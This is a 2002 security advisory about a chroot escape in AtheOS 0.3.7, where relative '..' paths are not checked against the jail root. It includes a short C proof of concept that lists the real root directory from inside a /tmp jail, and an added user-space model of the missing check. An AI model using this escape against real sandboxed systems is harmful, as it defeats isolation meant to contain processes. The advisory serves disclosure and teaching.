AtheOS chroot escape
8th Feb 2002 [SBWID-5081]

	AtheOS chroot escape


	AtheOS version 0.3.7


	Frank DENIS 'Jedi/Sector One' [http://www.Jedi.Claranet.Fr] posted:

	After a chroot() call on AtheOS, '/' indeed seems to become the base
	directory. '/path/to/file' is translated to
	'<directory>/path/to/file'.

	Unfortunately, relative paths aren't checked against the current
	chroot jail. Therefore, '../../../../path/to/file' will be translated
	to a file out of the chroot limits.

	The following code will read the content of the real '/' directory,
	while '/tmp' is supposed to be the base of the chroot jail.

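	#include <stdio.h>
	#include <unistd.h>
	#include <dirent.h>

	int main(void)
	{
	    register DIR *d;
	    register const struct dirent *e;

	    /* Enter the jail rooted at /tmp, then open ".." from its root. */
	    if (chdir("/") || chroot("/tmp") || chdir("/") ||
	        (d = opendir("..")) == NULL) {
	        return 1;
	    }
	    /* List the directory that ".." resolved to. */
	    while ((e = readdir(d)) != NULL) {
	        puts(e->d_name);
	    }
	    closedir(d);
	    return 0;
	}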

	None yet. Check: [http://www.atheos.cx]
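
	The check that the post reports as missing, shown as an added user-space model (not AtheOS kernel code and not part of the original advisory): resolve() is a hypothetical helper that walks a path component by component and, when clamp is set, refuses to step above the jail root on '..'. With clamp off, '..' is never compared against the jail root, which is this model's assumption about the reported behaviour.

```c
#include <stdio.h>
#include <string.h>

/* Model of path lookup for a jailed process (hypothetical helper).
 * jail and cwd are real absolute paths without a trailing slash.
 * clamp != 0: ".." at the jail root stays at the jail root (expected rule).
 * clamp == 0: ".." is never checked against the jail root (flawed rule). */
const char *resolve(const char *jail, const char *cwd,
                    const char *path, int clamp)
{
    static char out[512];

    /* Absolute paths start at the jail root, relative ones at cwd. */
    snprintf(out, sizeof out, "%s", path[0] == '/' ? jail : cwd);

    while (*path) {
        size_t n = strcspn(path, "/");          /* length of this component */
        if (n == 2 && strncmp(path, "..", 2) == 0) {
            int at_jail_root = strcmp(out, jail) == 0;
            if (!(clamp && at_jail_root)) {     /* step up one directory */
                char *slash = strrchr(out, '/');
                if (slash)
                    *slash = '\0';
            }
        } else if (n > 0 && !(n == 1 && path[0] == '.')) {
            size_t len = strlen(out);           /* descend into component */
            snprintf(out + len, sizeof out - len, "/%.*s", (int)n, path);
        }
        path += n;
        while (*path == '/')
            path++;
    }
    return out[0] ? out : "/";                  /* "" means the real root */
}

int main(void)
{
    /* Constructed inputs: jail at /tmp, as in the advisory's test case. */
    const char *p[] = { "/path/to/file", "..", "../../../../path/to/file" };
    for (int i = 0; i < 3; i++) {
        printf("%-26s unchecked: %-16s", p[i], resolve("/tmp", "/tmp", p[i], 0));
        printf(" clamped: %s\n", resolve("/tmp", "/tmp", p[i], 1));
    }
    return 0;
}
```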

